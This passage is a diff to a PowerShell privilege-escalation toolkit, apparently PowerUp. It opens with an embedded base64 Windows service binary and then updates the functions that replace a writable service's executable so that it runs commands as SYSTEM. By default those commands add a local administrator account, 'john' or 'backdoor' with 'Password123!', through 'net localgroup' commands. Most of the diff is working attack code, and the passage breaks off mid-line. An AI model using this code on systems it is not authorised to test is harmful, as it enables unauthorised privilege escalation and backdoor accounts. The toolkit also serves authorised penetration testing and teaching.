AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAA9jAG0AZAAuAGUAeABlAABwlQEkfW6TS5S/gwmLKZ5MAAiwP19/EdUKOgi3elxWGTTgiQMGEg0EIAEBAgMgAAEFIAEBHQ4DAAABBCABAQ4FIAEBEUkEIAEBCAMgAA4GAAISYQ4OBAABAQgDBwEOBgABAR0SBQgHAh0SBR0SBQwBAAdVcGRhdGVyAAAFAQAAAAAXAQASQ29weXJpZ2h0IMKpICAyMDE1AAApAQAkN2NhMWIzMmEtOWMzNy00MTViLWJkOWYtZGRmNDE5OWUxNmVjAAAMAQAHMS4wLjAuMAAAZQEAKS5ORVRGcmFtZXdvcmssVmVyc2lvbj12NC4wLFByb2ZpbGU9Q2xpZW50AQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZR8uTkVUIEZyYW1ld29yayA0IENsaWVudCBQcm9maWxlCAEAAgAAAAAACAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQAAAAAA0zU/VQAAAAACAAAAWgAAAGxpAABsSwAAUlNEU96HoAZJqgNGhaplF41X24IDAAAAQzpcVXNlcnNcbGFiXERlc2t0b3BcVXBkYXRlcjJcVXBkYXRlclxvYmpceDg2XFJlbGVhc2VcVXBkYXRlci5wZGIAAADwaQAAAAAAAAAAAAAOagAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGoAAAAAAAAAAAAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAAgAACAGAAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAAFAAAIAAAAAAAAAAAAAAAAAAAAEAAQAAAGgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACggAAAoAIAAAAAAAAAAAAAQIMAAOoBAAAAAAAAAAAAAKACNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAABAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAQAAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAADcAQAAAQAwADAAMAAwADAANABiADAAAAA4AAgAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAVQBwAGQAYQB0AGUAcgAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAADgADAABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAVQBwAGQAYQB0AGUAcgAuAGUAeABlAAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIACpACAAIAAyADAAMQA1AAAAQAAMAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAFUAcABkAGEAdABlAHIALgBlAHgAZQAAADAACAABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAVQBwAGQAYQB0AGUAcgAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAO+7vzw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJ5ZXMiPz4NCjxhc3NlbWJseSB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEiIG1hbmlmZXN0VmVyc2lvbj0iMS4wIj4NCiAgPGFzc2VtYmx5SWRlbnRpdHkgdmVyc2lvbj0iMS4wLjAuMCIgbmFtZT0iTXlBcHBsaWNhdGlvbi5hcHAiLz4NCiAgPHRydXN0SW5mbyB4bWxucz0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjIiPg0KICAgIDxzZWN1cml0eT4NCiAgICAgIDxyZXF1ZXN0ZWRQcml2aWxlZ2VzIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2VyIiB1aUFjY2Vzcz0iZmFsc2UiLz4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCjwvYXNzZW1ibHk+DQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAgOgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" [Byte[]] $Binary = [Byte[]][Convert]::FromBase64String($B64Binary) - if($PSBoundParameters['Command']) { + if ($PSBoundParameters['Command']) { $ServiceCommand = $Command } else { - if($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Credential']) { $UserNameToAdd = $Credential.UserName $PasswordToAdd = $Credential.GetNetworkCredential().Password } @@ -1995,7 +2653,7 @@ function Write-ServiceBinary { $PasswordToAdd = $Password } - if($UserNameToAdd.Contains('\')) { + if ($UserNameToAdd.Contains('\')) { # only adding a domain user to the local group, no user creation $ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd /add" } @@ -2031,6 +2689,7 @@ function Write-ServiceBinary { $Out | Add-Member Noteproperty 'ServiceName' $TargetService.Name $Out | Add-Member Noteproperty 'Path' $Path $Out | Add-Member Noteproperty 'Command' $ServiceCommand + $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary') $Out } } @@ -2038,87 +2697,97 @@ function Write-ServiceBinary { function Install-ServiceBinary { <# - .SYNOPSIS +.SYNOPSIS - Replaces the service binary for the specified service with one that executes - a specified command as SYSTEM. +Replaces the service binary for the specified service with one that executes +a specified command as SYSTEM. - Author: @harmj0y - License: BSD 3-Clause +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath, Write-ServiceBinary - .DESCRIPTION +.DESCRIPTION - Takes a esrvice Name or a ServiceProcess.ServiceController on the pipeline where the - current user can modify the associated service binary listed in the binPath. Backs up - the original service binary to "OriginalService.exe.bak" in service binary location, - and then uses Write-ServiceBinary to create a C# service binary that either adds - a local administrator user or executes a custom command. The new service binary is - replaced in the original service binary path, and a custom object is returned that - captures the original and new service binary configuration. +Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the +current user can modify the associated service binary listed in the binPath. Backs up +the original service binary to "OriginalService.exe.bak" in service binary location, +and then uses Write-ServiceBinary to create a C# service binary that either adds +a local administrator user or executes a custom command. The new service binary is +replaced in the original service binary path, and a custom object is returned that +captures the original and new service binary configuration. - .PARAMETER Name +.PARAMETER Name - The service name the EXE will be running under. +The service name the EXE will be running under. - .PARAMETER UserName +.PARAMETER UserName - The [domain\]username to add. If not given, it defaults to "john". - Domain users are not created, only added to the specified localgroup. +The [domain\]username to add. If not given, it defaults to "john". +Domain users are not created, only added to the specified localgroup. - .PARAMETER Password +.PARAMETER Password - The password to set for the added user. If not given, it defaults to "Password123!" +The password to set for the added user. If not given, it defaults to "Password123!" - .PARAMETER LocalGroup +.PARAMETER LocalGroup - Local group name to add the user to (default of 'Administrators'). +Local group name to add the user to (default of 'Administrators'). - .PARAMETER Credential +.PARAMETER Credential - A [Management.Automation.PSCredential] object specifying the user/password to add. +A [Management.Automation.PSCredential] object specifying the user/password to add. - .PARAMETER Command +.PARAMETER Command - Custom command to execute instead of user creation. +Custom command to execute instead of user creation. - .EXAMPLE +.EXAMPLE + +Install-ServiceBinary -Name VulnSVC - PS C:\> Install-ServiceBinary -Name VulnSVC +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). - Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary - for VulnSVC with one that adds a local Administrator (john/Password123!). +.EXAMPLE - .EXAMPLE +Get-Service VulnSVC | Install-ServiceBinary - PS C:\> Get-Service VulnSVC | Install-ServiceBinary +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (john/Password123!). - Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary - for VulnSVC with one that adds a local Administrator (john/Password123!). +.EXAMPLE - .EXAMPLE +Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' - PS C:\> Install-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john' +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds TESTLAB\john to the Administrators local group. - Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary - for VulnSVC with one that adds TESTLAB\john to the Administrators local group. +.EXAMPLE - .EXAMPLE +Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! - PS C:\> Install-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123! +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that adds a local Administrator (backdoor/Password123!). - Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary - for VulnSVC with one that adds a local Administrator (backdoor/Password123!). +.EXAMPLE - .EXAMPLE +Install-ServiceBinary -Name VulnSVC -Command "net ..." - PS C:\> Install-ServiceBinary -Name VulnSVC -Command "net ..." +Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary +for VulnSVC with one that executes a custom command. - Backs up the original service binary to SERVICE_PATH.exe.bak and replaces the binary - for VulnSVC with one that executes a custom command. +.OUTPUTS + +PowerUp.ServiceBinary.Installed #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')] + [OutputType('PowerUp.ServiceBinary.Installed')] + [CmdletBinding()] Param( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('ServiceName')] [String] [ValidateNotNullOrEmpty()] @@ -2134,7 +2803,8 @@ function Install-ServiceBinary { $LocalGroup = 'Administrators', [Management.Automation.PSCredential] - $Credential, + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, [String] [ValidateNotNullOrEmpty()] @@ -2142,11 +2812,11 @@ function Install-ServiceBinary { ) BEGIN { - if($PSBoundParameters['Command']) { + if ($PSBoundParameters['Command']) { $ServiceCommand = $Command } else { - if($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Credential']) { $UserNameToAdd = $Credential.UserName $PasswordToAdd = $Credential.GetNetworkCredential().Password } @@ -2155,7 +2825,7 @@ function Install-ServiceBinary { $PasswordToAdd = $Password } - if($UserNameToAdd.Contains('\')) { + if ($UserNameToAdd.Contains('\')) { # only adding a domain user to the local group, no user creation $ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd /add" } @@ -2167,14 +2837,11 @@ function Install-ServiceBinary { } PROCESS { - - $TargetService = Get-Service -Name $Name - + $TargetService = Get-Service -Name $Name -ErrorAction Stop $ServiceDetails = $TargetService | Get-ServiceDetail + $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -Literal - $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -LiteralPaths - - if(-not $ModifiableFiles) { + if (-not $ModifiableFiles) { throw "Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user." } @@ -2192,6 +2859,7 @@ function Install-ServiceBinary { $Result = Write-ServiceBinary -Name $ServiceDetails.Name -Command $ServiceCommand -Path $ServicePath $Result | Add-Member Noteproperty 'BackupPath' $BackupPath + $Result.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary.Installed') $Result } } @@ -2199,46 +2867,57 @@ function Install-ServiceBinary { function Restore-ServiceBinary { <# - .SYNOPSIS +.SYNOPSIS + +Restores a service binary backed up by Install-ServiceBinary. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ServiceDetail, Get-ModifiablePath + +.DESCRIPTION - Restores a service binary backed up by Install-ServiceBinary. +Takes a service Name or a ServiceProcess.ServiceController on the pipeline and +checks for the existence of an "OriginalServiceBinary.exe.bak" in the service +binary location. If it exists, the backup binary is restored to the original +binary path. - .DESCRIPTION +.PARAMETER Name - Takes a service Name or a ServiceProcess.ServiceController on the pipeline and - checks for the existence of an "OriginalServiceBinary.exe.bak" in the service - binary location. If it exists, the backup binary is restored to the original - binary path. +The service name to restore a binary for. - .PARAMETER Name +.PARAMETER BackupPath - The service name to restore a binary for. +Optional manual path to the backup binary. - .PARAMETER BackupPath +.EXAMPLE - Optional manual path to the backup binary. +Restore-ServiceBinary -Name VulnSVC - .EXAMPLE +Restore the original binary for the service 'VulnSVC'. - PS C:\> Restore-ServiceBinary -Name VulnSVC +.EXAMPLE - Restore the original binary for the service 'VulnSVC'. +Get-Service VulnSVC | Restore-ServiceBinary - .EXAMPLE +Restore the original binary for the service 'VulnSVC'. - PS C:\> Get-Service VulnSVC | Restore-ServiceBinary +.EXAMPLE - Restore the original binary for the service 'VulnSVC'. +Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe' - .EXAMPLE +Restore the original binary for the service 'VulnSVC' from a custom location. - PS C:\> Restore-ServiceBinary -Name VulnSVC -BackupPath 'C:\temp\backup.exe' +.OUTPUTS - Restore the original binary for the service 'VulnSVC' from a custom location. +PowerUp.ServiceBinary.Installed #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerUp.ServiceBinary.Restored')] + [CmdletBinding()] Param( - [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)] + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Alias('ServiceName')] [String] [ValidateNotNullOrEmpty()] @@ -2251,14 +2930,11 @@ function Restore-ServiceBinary { ) PROCESS { - - $TargetService = Get-Service -Name $Name - + $TargetService = Get-Service -Name $Name -ErrorAction Stop $ServiceDetails = $TargetService | Get-ServiceDetail + $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -Literal - $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -LiteralPaths - - if(-not $ModifiableFiles) { + if 